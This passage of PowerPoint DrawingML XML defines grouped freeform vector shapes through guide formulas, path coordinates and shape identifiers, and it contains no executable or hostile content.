                  <a:gd name="T16" fmla="*/ 46 w 67"/>
                  <a:gd name="T17" fmla="*/ 78 h 87"/>
                  <a:gd name="T18" fmla="*/ 38 w 67"/>
                  <a:gd name="T19" fmla="*/ 81 h 87"/>
                  <a:gd name="T20" fmla="*/ 31 w 67"/>
                  <a:gd name="T21" fmla="*/ 83 h 87"/>
                  <a:gd name="T22" fmla="*/ 23 w 67"/>
                  <a:gd name="T23" fmla="*/ 84 h 87"/>
                  <a:gd name="T24" fmla="*/ 15 w 67"/>
                  <a:gd name="T25" fmla="*/ 86 h 87"/>
                  <a:gd name="T26" fmla="*/ 6 w 67"/>
                  <a:gd name="T27" fmla="*/ 86 h 87"/>
                  <a:gd name="T28" fmla="*/ 2 w 67"/>
                  <a:gd name="T29" fmla="*/ 84 h 87"/>
                  <a:gd name="T30" fmla="*/ 0 w 67"/>
                  <a:gd name="T31" fmla="*/ 81 h 87"/>
                  <a:gd name="T32" fmla="*/ 0 w 67"/>
                  <a:gd name="T33" fmla="*/ 76 h 87"/>
                  <a:gd name="T34" fmla="*/ 6 w 67"/>
                  <a:gd name="T35" fmla="*/ 65 h 87"/>
                  <a:gd name="T36" fmla="*/ 16 w 67"/>
                  <a:gd name="T37" fmla="*/ 25 h 87"/>
                  <a:gd name="T38" fmla="*/ 18 w 67"/>
                  <a:gd name="T39" fmla="*/ 19 h 87"/>
                  <a:gd name="T40" fmla="*/ 23 w 67"/>
                  <a:gd name="T41" fmla="*/ 17 h 8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7"/>
                  <a:gd name="T64" fmla="*/ 0 h 87"/>
                  <a:gd name="T65" fmla="*/ 67 w 67"/>
                  <a:gd name="T66" fmla="*/ 87 h 8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7" h="87">
                    <a:moveTo>
                      <a:pt x="23" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84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6" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17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7" name="Freeform 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3846F6F9-E849-4ECD-B7B2-61CDADD79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" y="2439"/>
                <a:ext cx="17" cy="79"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 79"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 79"/>
                  <a:gd name="T4" fmla="*/ 5 w 17"/>
                  <a:gd name="T5" fmla="*/ 6 h 79"/>
                  <a:gd name="T6" fmla="*/ 9 w 17"/>
                  <a:gd name="T7" fmla="*/ 13 h 79"/>
                  <a:gd name="T8" fmla="*/ 5 w 17"/>
                  <a:gd name="T9" fmla="*/ 19 h 79"/>
                  <a:gd name="T10" fmla="*/ 9 w 17"/>
                  <a:gd name="T11" fmla="*/ 54 h 79"/>
                  <a:gd name="T12" fmla="*/ 9 w 17"/>
                  <a:gd name="T13" fmla="*/ 77 h 79"/>
                  <a:gd name="T14" fmla="*/ 16 w 17"/>
                  <a:gd name="T15" fmla="*/ 78 h 79"/>
                  <a:gd name="T16" fmla="*/ 16 w 17"/>
                  <a:gd name="T17" fmla="*/ 31 h 79"/>
                  <a:gd name="T18" fmla="*/ 9 w 17"/>
                  <a:gd name="T19" fmla="*/ 19 h 79"/>
                  <a:gd name="T20" fmla="*/ 9 w 17"/>
                  <a:gd name="T21" fmla="*/ 15 h 79"/>
                  <a:gd name="T22" fmla="*/ 16 w 17"/>
                  <a:gd name="T23" fmla="*/ 13 h 79"/>
                  <a:gd name="T24" fmla="*/ 9 w 17"/>
                  <a:gd name="T25" fmla="*/ 7 h 79"/>
                  <a:gd name="T26" fmla="*/ 5 w 17"/>
                  <a:gd name="T27" fmla="*/ 5 h 79"/>
                  <a:gd name="T28" fmla="*/ 5 w 17"/>
                  <a:gd name="T29" fmla="*/ 0 h 7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79"/>
                  <a:gd name="T47" fmla="*/ 17 w 17"/>
                  <a:gd name="T48" fmla="*/ 79 h 7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79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9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7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8" name="Freeform 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D069C63-6F92-45B5-AC27-BEA07801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43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16 h 17"/>
                  <a:gd name="T4" fmla="*/ 13 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 17"/>
                  <a:gd name="T9" fmla="*/ 8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8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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599" name="Freeform 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F843651E-C7D8-46FC-84E9-23B50D62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2" y="2225"/>
                <a:ext cx="22" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 22"/>
                  <a:gd name="T1" fmla="*/ 0 h 49"/>
                  <a:gd name="T2" fmla="*/ 17 w 22"/>
                  <a:gd name="T3" fmla="*/ 1 h 49"/>
                  <a:gd name="T4" fmla="*/ 18 w 22"/>
                  <a:gd name="T5" fmla="*/ 4 h 49"/>
                  <a:gd name="T6" fmla="*/ 16 w 22"/>
                  <a:gd name="T7" fmla="*/ 2 h 49"/>
                  <a:gd name="T8" fmla="*/ 16 w 22"/>
                  <a:gd name="T9" fmla="*/ 5 h 49"/>
                  <a:gd name="T10" fmla="*/ 12 w 22"/>
                  <a:gd name="T11" fmla="*/ 5 h 49"/>
                  <a:gd name="T12" fmla="*/ 16 w 22"/>
                  <a:gd name="T13" fmla="*/ 7 h 49"/>
                  <a:gd name="T14" fmla="*/ 8 w 22"/>
                  <a:gd name="T15" fmla="*/ 8 h 49"/>
                  <a:gd name="T16" fmla="*/ 12 w 22"/>
                  <a:gd name="T17" fmla="*/ 12 h 49"/>
                  <a:gd name="T18" fmla="*/ 5 w 22"/>
                  <a:gd name="T19" fmla="*/ 12 h 49"/>
                  <a:gd name="T20" fmla="*/ 10 w 22"/>
                  <a:gd name="T21" fmla="*/ 15 h 49"/>
                  <a:gd name="T22" fmla="*/ 4 w 22"/>
                  <a:gd name="T23" fmla="*/ 15 h 49"/>
                  <a:gd name="T24" fmla="*/ 7 w 22"/>
                  <a:gd name="T25" fmla="*/ 20 h 49"/>
                  <a:gd name="T26" fmla="*/ 2 w 22"/>
                  <a:gd name="T27" fmla="*/ 19 h 49"/>
                  <a:gd name="T28" fmla="*/ 6 w 22"/>
                  <a:gd name="T29" fmla="*/ 23 h 49"/>
                  <a:gd name="T30" fmla="*/ 0 w 22"/>
                  <a:gd name="T31" fmla="*/ 24 h 49"/>
                  <a:gd name="T32" fmla="*/ 5 w 22"/>
                  <a:gd name="T33" fmla="*/ 27 h 49"/>
                  <a:gd name="T34" fmla="*/ 0 w 22"/>
                  <a:gd name="T35" fmla="*/ 29 h 49"/>
                  <a:gd name="T36" fmla="*/ 6 w 22"/>
                  <a:gd name="T37" fmla="*/ 31 h 49"/>
                  <a:gd name="T38" fmla="*/ 0 w 22"/>
                  <a:gd name="T39" fmla="*/ 34 h 49"/>
                  <a:gd name="T40" fmla="*/ 6 w 22"/>
                  <a:gd name="T41" fmla="*/ 36 h 49"/>
                  <a:gd name="T42" fmla="*/ 1 w 22"/>
                  <a:gd name="T43" fmla="*/ 40 h 49"/>
                  <a:gd name="T44" fmla="*/ 6 w 22"/>
                  <a:gd name="T45" fmla="*/ 42 h 49"/>
                  <a:gd name="T46" fmla="*/ 4 w 22"/>
                  <a:gd name="T47" fmla="*/ 44 h 49"/>
                  <a:gd name="T48" fmla="*/ 8 w 22"/>
                  <a:gd name="T49" fmla="*/ 48 h 4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2"/>
                  <a:gd name="T76" fmla="*/ 0 h 49"/>
                  <a:gd name="T77" fmla="*/ 22 w 22"/>
                  <a:gd name="T78" fmla="*/ 49 h 4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2" h="49">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="1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6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12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2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29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6" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="48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</p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="340" name="Group 165">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B20165-689B-4207-B681-5083F153F7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1223" y="4608501"/>
              <a:ext cx="609599" cy="550865"/>
              <a:chOff x="4534" y="2163"/>
              <a:chExt cx="444" cy="395"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="348" name="Freeform 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8AF6B6C-4E1E-46A5-8B37-C75C801FB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" y="2324"/>
                <a:ext cx="133" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 44 w 133"/>
                  <a:gd name="T1" fmla="*/ 3 h 172"/>
                  <a:gd name="T2" fmla="*/ 0 w 133"/>
                  <a:gd name="T3" fmla="*/ 155 h 172"/>
                  <a:gd name="T4" fmla="*/ 132 w 133"/>
                  <a:gd name="T5" fmla="*/ 171 h 172"/>
                  <a:gd name="T6" fmla="*/ 98 w 133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3"/>
                  <a:gd name="T13" fmla="*/ 0 h 172"/>
                  <a:gd name="T14" fmla="*/ 133 w 133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3" h="172">
                    <a:moveTo>
                      <a:pt x="44" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9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49" name="Freeform 167">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFDB0383-739C-4FCB-825E-903CDC960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289"/>
                <a:ext cx="368" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 368"/>
                  <a:gd name="T1" fmla="*/ 31 h 62"/>
                  <a:gd name="T2" fmla="*/ 230 w 368"/>
                  <a:gd name="T3" fmla="*/ 61 h 62"/>
                  <a:gd name="T4" fmla="*/ 367 w 368"/>
                  <a:gd name="T5" fmla="*/ 15 h 62"/>
                  <a:gd name="T6" fmla="*/ 194 w 368"/>
                  <a:gd name="T7" fmla="*/ 0 h 62"/>
                  <a:gd name="T8" fmla="*/ 0 w 368"/>
                  <a:gd name="T9" fmla="*/ 31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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 62"/>
                  <a:gd name="T17" fmla="*/ 368 w 368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8" h="62">
                    <a:moveTo>
                      <a:pt x="0" y="31"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194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0" name="Freeform 168">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9085C295-D25C-44EE-8E23-83640C397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2320"/>
                <a:ext cx="232" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 232"/>
                  <a:gd name="T1" fmla="*/ 0 h 39"/>
                  <a:gd name="T2" fmla="*/ 231 w 232"/>
                  <a:gd name="T3" fmla="*/ 28 h 39"/>
                  <a:gd name="T4" fmla="*/ 231 w 232"/>
                  <a:gd name="T5" fmla="*/ 38 h 39"/>
                  <a:gd name="T6" fmla="*/ 0 w 232"/>
                  <a:gd name="T7" fmla="*/ 9 h 39"/>
                  <a:gd name="T8" fmla="*/ 0 w 23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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 39"/>
                  <a:gd name="T17" fmla="*/ 232 w 23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2" h="39">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="231" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="38"/>
                    </a:ln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1" name="Freeform 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB544C9E-0F91-4580-ABE3-1A98C04B7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2304"/>
                <a:ext cx="136" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 136"/>
                  <a:gd name="T1" fmla="*/ 54 h 55"/>
                  <a:gd name="T2" fmla="*/ 0 w 136"/>
                  <a:gd name="T3" fmla="*/ 44 h 55"/>
                  <a:gd name="T4" fmla="*/ 135 w 136"/>
                  <a:gd name="T5" fmla="*/ 0 h 55"/>
                  <a:gd name="T6" fmla="*/ 135 w 136"/>
                  <a:gd name="T7" fmla="*/ 6 h 55"/>
                  <a:gd name="T8" fmla="*/ 0 w 136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55"/>
                  <a:gd name="T17" fmla="*/ 136 w 136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55">
                    <a:moveTo>
                      <a:pt x="0" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="6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2" name="Freeform 170">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321608F4-AD97-4054-98E1-1773D8ED8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" y="2337"/>
                <a:ext cx="161" cy="221"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 161"/>
                  <a:gd name="T1" fmla="*/ 0 h 221"/>
                  <a:gd name="T2" fmla="*/ 0 w 161"/>
                  <a:gd name="T3" fmla="*/ 203 h 221"/>
                  <a:gd name="T4" fmla="*/ 160 w 161"/>
                  <a:gd name="T5" fmla="*/ 220 h 221"/>
                  <a:gd name="T6" fmla="*/ 134 w 161"/>
                  <a:gd name="T7" fmla="*/ 4 h 2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1"/>
                  <a:gd name="T13" fmla="*/ 0 h 221"/>
                  <a:gd name="T14" fmla="*/ 161 w 161"/>
                  <a:gd name="T15" fmla="*/ 221 h 2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1" h="221">
                    <a:moveTo>
                      <a:pt x="72" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="4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3" name="Freeform 171">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8576DB2-6E92-4414-BB14-E186CB63B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266"/>
                <a:ext cx="114" cy="62"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 18 h 62"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 61 h 62"/>
                  <a:gd name="T4" fmla="*/ 113 w 114"/>
                  <a:gd name="T5" fmla="*/ 29 h 62"/>
                  <a:gd name="T6" fmla="*/ 113 w 114"/>
                  <a:gd name="T7" fmla="*/ 0 h 62"/>
                  <a:gd name="T8" fmla="*/ 0 w 114"/>
                  <a:gd name="T9" fmla="*/ 18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62"/>
                  <a:gd name="T17" fmla="*/ 114 w 11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62">
                    <a:moveTo>
                      <a:pt x="0" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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A0A0A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4" name="Freeform 172">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1604457B-9531-4DEE-8574-FFF264960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2280"/>
                <a:ext cx="85" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 84 w 85"/>
                  <a:gd name="T1" fmla="*/ 4 h 48"/>
                  <a:gd name="T2" fmla="*/ 84 w 85"/>
                  <a:gd name="T3" fmla="*/ 47 h 48"/>
                  <a:gd name="T4" fmla="*/ 0 w 85"/>
                  <a:gd name="T5" fmla="*/ 36 h 48"/>
                  <a:gd name="T6" fmla="*/ 0 w 85"/>
                  <a:gd name="T7" fmla="*/ 0 h 48"/>
                  <a:gd name="T8" fmla="*/ 84 w 85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48"/>
                  <a:gd name="T17" fmla="*/ 85 w 8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48">
                    <a:moveTo>
                      <a:pt x="84" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="84" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="4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5" name="Freeform 173">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7453A5D9-3632-4DF3-BC16-14A402B7E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2266"/>
                <a:ext cx="198" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 198"/>
                  <a:gd name="T1" fmla="*/ 15 h 20"/>
                  <a:gd name="T2" fmla="*/ 84 w 198"/>
                  <a:gd name="T3" fmla="*/ 19 h 20"/>
                  <a:gd name="T4" fmla="*/ 197 w 198"/>
                  <a:gd name="T5" fmla="*/ 0 h 20"/>
                  <a:gd name="T6" fmla="*/ 113 w 198"/>
                  <a:gd name="T7" fmla="*/ 0 h 20"/>
                  <a:gd name="T8" fmla="*/ 0 w 198"/>
                  <a:gd name="T9" fmla="*/ 15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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 20"/>
                  <a:gd name="T17" fmla="*/ 198 w 198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8" h="20">
                    <a:moveTo>
                      <a:pt x="0" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="84" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0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6" name="Freeform 174">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B06B87-EF65-4720-B5FB-F3FE934EE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3" y="2260"/>
                <a:ext cx="73" cy="19"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 73"/>
                  <a:gd name="T1" fmla="*/ 9 h 19"/>
                  <a:gd name="T2" fmla="*/ 0 w 73"/>
                  <a:gd name="T3" fmla="*/ 15 h 19"/>
                  <a:gd name="T4" fmla="*/ 33 w 73"/>
                  <a:gd name="T5" fmla="*/ 18 h 19"/>
                  <a:gd name="T6" fmla="*/ 72 w 73"/>
                  <a:gd name="T7" fmla="*/ 11 h 19"/>
                  <a:gd name="T8" fmla="*/ 72 w 73"/>
                  <a:gd name="T9" fmla="*/ 0 h 19"/>
                  <a:gd name="T10" fmla="*/ 0 w 73"/>
                  <a:gd name="T11" fmla="*/ 9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9"/>
                  <a:gd name="T20" fmla="*/ 73 w 73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9">
                    <a:moveTo>
                      <a:pt x="0" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72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7" name="Freeform 175">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6D28812-2CCF-4F73-B937-4306E561B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" y="2185"/>
                <a:ext cx="91" cy="86"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 91"/>
                  <a:gd name="T1" fmla="*/ 85 h 86"/>
                  <a:gd name="T2" fmla="*/ 0 w 91"/>
                  <a:gd name="T3" fmla="*/ 2 h 86"/>
                  <a:gd name="T4" fmla="*/ 77 w 91"/>
                  <a:gd name="T5" fmla="*/ 0 h 86"/>
                  <a:gd name="T6" fmla="*/ 90 w 91"/>
                  <a:gd name="T7" fmla="*/ 72 h 86"/>
                  <a:gd name="T8" fmla="*/ 12 w 91"/>
                  <a:gd name="T9" fmla="*/ 85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6"/>
                  <a:gd name="T17" fmla="*/ 91 w 91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6">
                    <a:moveTo>
                      <a:pt x="12" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A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8" name="Freeform 176">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE79BDD7-C92A-48FA-BA5A-E39A0F819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2190"/>
                <a:ext cx="84" cy="85"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 69 w 84"/>
                  <a:gd name="T1" fmla="*/ 0 h 85"/>
                  <a:gd name="T2" fmla="*/ 0 w 84"/>
                  <a:gd name="T3" fmla="*/ 18 h 85"/>
                  <a:gd name="T4" fmla="*/ 9 w 84"/>
                  <a:gd name="T5" fmla="*/ 84 h 85"/>
                  <a:gd name="T6" fmla="*/ 83 w 84"/>
                  <a:gd name="T7" fmla="*/ 81 h 85"/>
                  <a:gd name="T8" fmla="*/ 69 w 84"/>
                  <a:gd name="T9" fmla="*/ 0 h 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85"/>
                  <a:gd name="T17" fmla="*/ 84 w 84"/>
                  <a:gd name="T18" fmla="*/ 85 h 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85">
                    <a:moveTo>
                      <a:pt x="69" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="0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59" name="Freeform 177">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71771F5D-378D-4398-B00D-D7E08D044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8" y="2194"/>
                <a:ext cx="68" cy="66"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 68"/>
                  <a:gd name="T1" fmla="*/ 2 h 66"/>
                  <a:gd name="T2" fmla="*/ 9 w 68"/>
                  <a:gd name="T3" fmla="*/ 65 h 66"/>
                  <a:gd name="T4" fmla="*/ 67 w 68"/>
                  <a:gd name="T5" fmla="*/ 57 h 66"/>
                  <a:gd name="T6" fmla="*/ 56 w 68"/>
                  <a:gd name="T7" fmla="*/ 0 h 66"/>
                  <a:gd name="T8" fmla="*/ 0 w 68"/>
                  <a:gd name="T9" fmla="*/ 2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66"/>
                  <a:gd name="T17" fmla="*/ 68 w 68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66">
                    <a:moveTo>
                      <a:pt x="0" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56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60" name="Freeform 178">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8D3C030-C4E2-4514-B749-78EBED646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71"/>
                <a:ext cx="65" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 42"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 12 h 42"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 41 h 42"/>
                  <a:gd name="T6" fmla="*/ 64 w 65"/>
                  <a:gd name="T7" fmla="*/ 23 h 42"/>
                  <a:gd name="T8" fmla="*/ 64 w 65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42"/>
                  <a:gd name="T17" fmla="*/ 65 w 65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42">
                    <a:moveTo>
                      <a:pt x="64" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="23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61" name="Line 179">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
